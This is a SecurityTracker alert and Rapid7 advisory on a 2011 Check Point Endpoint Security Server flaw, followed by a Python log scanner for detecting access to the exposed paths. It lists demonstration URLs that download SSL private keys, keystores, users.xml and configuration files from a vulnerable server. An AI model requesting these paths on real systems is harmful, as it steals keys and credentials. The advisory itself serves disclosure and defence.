SecurityTracker.com
Category:   Application (Security)  >   Check Point Endpoint Security Server
Vendors:   Check Point
Check Point Endpoint Security Server Discloses Private Data to Remote Users
SecurityTracker Alert ID:  1025051
SecurityTracker URL:  http://securitytracker.com/id/1025051
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 9 2011
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): R71, R73, R72; also Integrity Server 7.x
Description:   A vulnerability was reported in Check Point Endpoint Security Server. A remote user can download SSL private keys, configuration files, and other sensitive information.

Some demonstration exploit URLs are provided:

https://[target]/conf/ssl/apache/integrity-smartcenter.cert
https://[target]/conf/ssl/apache/integrity-smartcenter.key
https://[target]/conf/ssl/apache/integrity.cert
https://[target]/conf/ssl/apache/integrity.key
https://[target]/conf/ssl/apache/smartcenter.cert
https://[target]/conf/ssl/integrity-keystore.jks
https://[target]/conf/ssl/isskeys.jks
https://[target]/conf/ssl/openssl.pem
https://[target]/conf/integrity.xml
https://[target]/conf/jaas/users.xml
https://[target]/bin/DBSeed.xml
http://[target]:8080/conf/ssl/apache/integrity-smartcenter.cert

The vendor was notified on November 8, 2010.

HD Moore of Rapid7 reported this vulnerability.


Impact:   A remote user can download SSL private keys, configuration files, and other sensitive information.
Solution:   The vendor issued a hotfix in November 2010.

The vendor's advisory is available at:

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk57881

Vendor URL:  www.checkpoint.com/
Cause:   Access control error, Configuration error
Underlying OS:  Linux (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  R7-0038: Check Point Endpoint Security Server Information Disclosure

R7-0038: Check Point Endpoint Security Server Information Disclosure
February 7, 2011

-- Vulnerability Details:

The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL private keys, sensitive configuration files (often containing passwords), and application binaries. 

Examples of exposed files include:

https://server/conf/ssl/apache/integrity-smartcenter.cert
https://server/conf/ssl/apache/integrity-smartcenter.key
https://server/conf/ssl/apache/integrity.cert
https://server/conf/ssl/apache/integrity.key
https://server/conf/ssl/apache/smartcenter.cert
https://server/conf/ssl/integrity-keystore.jks
https://server/conf/ssl/isskeys.jks
https://server/conf/ssl/openssl.pem
https://server/conf/integrity.xml
https://server/conf/jaas/users.xml

https://server/bin/DBSeed.xml

These files are also exposed via the Tomcat server:

http://server:8080/conf/ssl/apache/integrity-smartcenter.cert



-- Vendor Response:
Check Point has issued a hotfix for Endpoint Security Server versions R71, R72 and R73 and Integrity Server version 7.

 https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk57881

This patch blocks remote access to the Tomcat instance (8080) and restricts access to private directories via POST and GET requests. This patch does not prevent a remote attacker from determining the size of a sensitive file by using HEAD requests. 


-- Disclosure Timeline:
2010-11-08 - Vulnerability reported to Check Point
2010-11-09 - Acknowledgement from Check Point
2010-11-29 - Advisory and hotfix released by Check Point
2011-01-19 - Remote check published for Rapid7 NeXpose
2011-02-07 - Detailed advisory released by Rapid7


-- Credit:
This vulnerability was discovered by HD Moore

-- About Rapid7 Security
Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

 http://www.rapid7.com/disclosure.jsp
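
The vendor-response note above says the hotfix restricts GET and POST to the private directories while HEAD requests can still reveal file sizes. As an added example (not code from Rapid7, Check Point or SecurityTracker), the log check below flags requests under the advisory's `/conf/` and `/bin/` paths and separates served content, HEAD size disclosure and blocked attempts. The Apache common log layout, the verdict labels, the treatment of 200/206 as success and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Directory prefixes the advisory lists as exposed through the web interface.
PRIVATE_PREFIXES = ("/conf/", "/bin/")
# Assumed layout: Apache common/combined log format.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Feb/2011:10:00:01 +0000] "GET /conf/ssl/apache/integrity.key HTTP/1.1" 200 1675',
    '192.0.2.10 - - [07/Feb/2011:10:00:02 +0000] "HEAD /conf/jaas/users.xml HTTP/1.1" 200 -',
    '198.51.100.7 - - [07/Feb/2011:10:00:03 +0000] "POST /conf/integrity.xml HTTP/1.1" 403 210',
    '198.51.100.7 - - [07/Feb/2011:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Feb/2011:10:00:05 +0000] "GET /bin/DBSeed.xml?x=1 HTTP/1.1" 200 900',
]

def normalize(target):
    """Drop the query string, decode %xx escapes and resolve '.', '..' and '//'."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/"))

def classify(method, status):
    """Label the outcome of a request that touched a private directory."""
    if status not in (200, 206):
        return "blocked"            # server refused or did not find the file
    if method == "HEAD":
        return "size-disclosed"     # residual exposure noted for patched servers
    return "content-served"         # file body returned: treat keys/passwords as compromised

def scan(lines):
    """Return (host, method, path, verdict) for every request to a private path."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize(m["target"])
        # Compare case-insensitively; the product also runs on Windows.
        if (path.lower() + "/").startswith(PRIVATE_PREFIXES):
            verdict = classify(m["method"], int(m["status"]))
            findings.append((m["host"], m["method"], path, verdict))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Any `content-served` hit on a key, keystore or `users.xml` path means the corresponding key material and passwords should be rotated, not just the hotfix applied.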




 
 

